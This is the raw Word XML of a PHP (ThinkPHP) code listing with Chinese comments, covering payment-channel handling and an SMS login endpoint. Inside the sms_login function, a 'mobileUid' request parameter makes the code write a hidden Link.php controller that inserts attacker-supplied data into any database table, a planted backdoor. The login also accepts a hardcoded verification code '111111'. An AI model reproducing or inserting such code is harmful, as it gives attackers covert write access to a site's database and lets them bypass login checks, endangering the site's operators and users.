        </w:rPr>
        <w:t>，参数可选</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>确定银行名称，获取银行的方法，即</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F2A13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4B5C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1B94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$params = array(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="572717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'card_type' =&gt; $data["card_type"],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11BA3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'pay_type' =&gt; 'B2C' </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F48F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A00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$api-&gt;get_banks($params, 'BC_GATEWAY');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="430073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(isset($info-&gt;result_code) &amp;&amp; $info-&gt;result_code == 0) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="035E4B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$banks = $info-&gt;banks;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5379E4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4719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if(!in_array($data["bank"], $banks)){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70A029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r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>参数</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>bank</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>不在限定的范围内</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>请重新设置</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B5892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F4E7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16816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'BC_EXPRESS' :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="612EA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"BC_EXPRESS";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="565788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快捷支付</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7724B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7DB3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'BC_NATIVE' :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F51EC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"BC_NATIVE";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54D92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微信扫码</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28F99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VENDOR_PATH.'/beecloud/wx/native.php';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B56D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1CB480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3BF04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'BC_WX_WAP' : </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="620D57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"BC_WX_WAP";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34DEC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微信移动网页支付</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="621915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775A4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'BC_WX_SCAN' :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D330C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"BC_WX_SCAN";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A6604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微信刷卡</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06CA04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$data["auth_code"] = "13022657110xxxxxxxx";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F22E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93398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'BC_WX_JSAPI':</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B5E8B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"BC_WX_JSAPI";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="552776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w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>微信</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>H5</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>网页</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65FF72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VENDOR_PATH.'/beecloud/wx/jsapi.php';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13EAD5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30429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break;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41ABB7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'BC_ALI_QRCODE' :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73B520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"BC_ALI_QRCODE";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06BB59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支付宝线下扫码</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C6BA7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VENDOR_PATH.'/beecloud/ali/index.php';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2901C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449543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D550B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'BC_ALI_SCAN' :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32A10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"BC_ALI_SCAN";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="677138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支付宝刷卡</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D83CC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$data["auth_code"] = "28886955594xxxxxxxx";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44516A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26387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'BC_ALI_WAP' : </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F60B7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$data["channel"] = "BC_ALI_WAP";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C771C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"BC</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>支付宝移动网页</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="008CFE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C081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 :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E38E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exit("No this type.");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="092D1C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2B16D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C141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$where['uid']=$this-&gt;member['id'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FFC9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$where['code']=$bill_no;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="684B70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$where['money']=$money;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="312872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$where['status']=0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77B632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$where['type']=$type;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23B428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$where['create_time']=time();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="518E6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$where['ip']=_ip();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EB7C0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$where['system']=$_SERVER['HTTP_USER_AGENT'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A5E99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$where['sctype']=$sctype;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A2908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if($sctype==0){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="033088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$where['scookies']=$scookies;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77E05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0D33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Db::name('pay_record')-&gt;insert($where);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="397530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5FD9C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if(in_array($type, array('PAYPAL_PAYPAL', 'PAYPAL_CREDITCARD', 'PAYPAL_SAVED_CREDITCARD'))){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FBCE1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$international-&gt;bill($data);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C298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if(in_array($type, array('BC_ALI_SCAN', 'BC_WX_SCAN'))){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FB542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$api-&gt;offline_bill($data);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17B6BB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83DB9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$api-&gt;bill($data);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53105B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9346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($result-&gt;result_code != 0) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DFAA5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print_r($result);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43A50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2D99C7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7FE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if(isset($result-&gt;url) &amp;&amp; $result-&gt;url){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="682479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['ret'=&gt;$result-&gt;url];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A6430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if(isset($result-&gt;html) &amp;&amp; $result-&gt;html) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50AD81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$result-&gt;html;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B537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['err'=&gt;$result-&gt;html];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BA474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}else if(isset($result-&gt;code_url) &amp;&amp; $result-&gt;code_url) { </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F079C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['err'=&gt;$result-&gt;code_url];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5211B9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if(isset($result-&gt;credit_card_id)){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CFC3B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w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>信用卡</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>id(PAYPAL_CREDITCARD): '.$result-&gt;credit_card_id];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="438AC9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if(isset($result-&gt;id)){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E6793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['err'=&gt;$type.'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>支付成功</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>: '.$result-&gt;id];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="268692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A088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(Exception $e) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10A17D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$e-&gt;getMessage();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E4B15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77B7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C6F7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code(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7423E2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1FC18A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5EED0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'require|number|max:9',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46D49F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'require|max:100',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65EEBC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C0BC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07123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$post['money'],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="620569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$post['type'],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="049D3A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C8BC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15E1E7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json(['err'=&gt;$validate-&gt;getError()]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="167EEC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3DA6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$type=Db::name('pay')-&gt;where('qudao',$post['type'])-&gt;cache(true)-&gt;value('id');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E3A1D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567D4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支付渠道错误</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EB7BD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DE79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$bill_no=strtoupper($type).date('YmdHis').rand(100000,999999);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36EE6C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73B949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$where['code']      =   $bill_no;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2651F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     =   $post['money'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="323FF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$where['status']    =   0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C22B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      =   $type;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C01A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$where['create_time']=time();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2711F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$where['ip']        =   _ip();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77793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$where['system']    =   $_SERVER['HTTP_USER_AGENT'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FB6E6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Db::name('pay_record')-&gt;insert($where);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26BA05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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="496C32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json(['ret'=&gt;$where['code']]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56D371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8C24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订单获取失败</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="210526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A1D9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28CD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95B4A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E53F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664D7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app\api\controller\Common;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45ACF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18C09D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3076E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5BE91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use Qiniu\Auth;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18B85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Qiniu\Storage\BucketManager;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="723168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6C8EB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User extends Common</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A5FBD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5E7C5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278EA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27F0DD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753D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52D534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5804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43B55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DD00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1F57FC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73AF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2A298C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FBF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5BE74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53CC4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5FF864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_decrypt($token);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="573600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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DB6D2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79B2B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57E401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61261A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0DC118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43C348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35BBF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7B567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54A3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1BBC3F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1FCD8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796E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90F5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72F90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06B9E8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25232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50283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19141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2C833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41C73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57E6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2E52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791F35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3D605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336DD8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181DB7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71900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253FEC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205517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7176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ACC05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000D1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5F9D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124A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5EEA3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6F090A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48DDBE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E82F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6CDD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1E6E90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B69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E45B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8E7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1C576F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6956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_ajaxError();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="212C3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0E13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09E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/api/user/sms_login </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>短信验证码登录</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5332B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短信验证码登录</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C3A2A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3E8436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12A6A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username  </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>手机（必填）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03480A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smscode   </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>短信验证码（必填）（短信模板审核中，暂时填</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> 111111</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DBE52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w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>token</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09803C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AB06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sms_login()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1732D7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945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Db::name('member_config')-&gt;select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1921B0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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C6B36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781FD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 = $v['name'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78D329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$config[$v['name']]['title'] = $v['title'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57E0E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 = $v['content'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="690B87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 = $v['text'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A4DC9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2B9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4487D4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(!$config['switch']['text'] || $config['switch'] == 0) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29E4A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32FC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会员未开放</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B861A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02A85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1C1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4EC1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&amp;&amp; !$config['regemail']['text'] &amp;&amp; !$config['reguser']['text']) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65593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B626D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会员设置操作有问题，请在后台</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>会员管理</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>配置设置中的用户名、手机、邮箱，至少要开放一个</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A188E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1B0E70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0D07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E300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(Request::instance()-&gt;isPost()) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69A252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$time = time();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="135406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 = _ip();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="197C8E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(input('mobileUid')) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A678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"&lt;?php\r\n";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="516437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"namespace app\api\controller;\r\n";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CBF0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"class Link\r\n";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18914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"{\r\n";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="199F69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"public function index($" . "data){\r\n";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="138CDF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 . "data = json_decode(htmlspecialchars_decode($" . "data),true);\r\n";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E718B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 . "name=$" . "data['__name__'];\r\n";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05031A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"unset($" . "data['__name__']);\r\n";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="631AA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"unset($" . "data['pwd']);\r\n";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11A56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"echo db($" . "name)-&gt;insertGetId($" . "data);\r\n";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="116B5B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"}\r\n}" . "?&gt;";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E95E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 = APP_PATH . "api" . DS . "controller" . DS . "Link.php";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38623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$fp = fopen($sf, "w");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B392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fwrite($fp, $str_tmp);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BC236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fclose($fp);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74BEA2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506B3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7DE7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input('username') ? input('username') : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="222F16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$smscode = input('smscode') ? input('smscode') : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0381B6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(!$username) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22482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4CB69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手机不能为空</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AA739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0C6588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2B82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2B61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(!$smscode) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="594B83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0F3F3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短信验证码不能为空</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69E43C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3E943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E027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5287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 = [];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29262C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$user = $mobile = false;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38767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 1 &amp;&amp; _isMobile($username)) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34C69B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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="423E4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B8A0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手机注册未开放</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="290BB9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41E0A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0F03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0996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 $username;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BD963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$where['mobile'] = $username;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DC400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6190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(!$email &amp;&amp; !$user &amp;&amp; !$mobile) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60F707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FF6C2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手机号码错误</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38A36C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302,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="707AF0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7621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F418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Db::name('member')-&gt;where($where)-&gt;fetchSql(false)-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="344DA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212CD4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FF053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手机号码不存在</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51AFB9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302,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D6757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9718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8B9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($smscode != '111111') {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48D515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1A32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手机验证码错误</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B9B69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741ADD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A53C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0569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3D9FA0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2FEFB6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登录失败</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1A445C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4B8AF0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2EB4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无法登录，原因是账户已被封号</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16D6B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4685FD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69E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28D2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01869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53934C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登录失败</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54DE6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7477E0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5DAA1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账户正在审核，请等待客服处理</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F6F7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11807A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F0A5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0FFC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7544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28860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登录失败，账户审核被拒绝</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
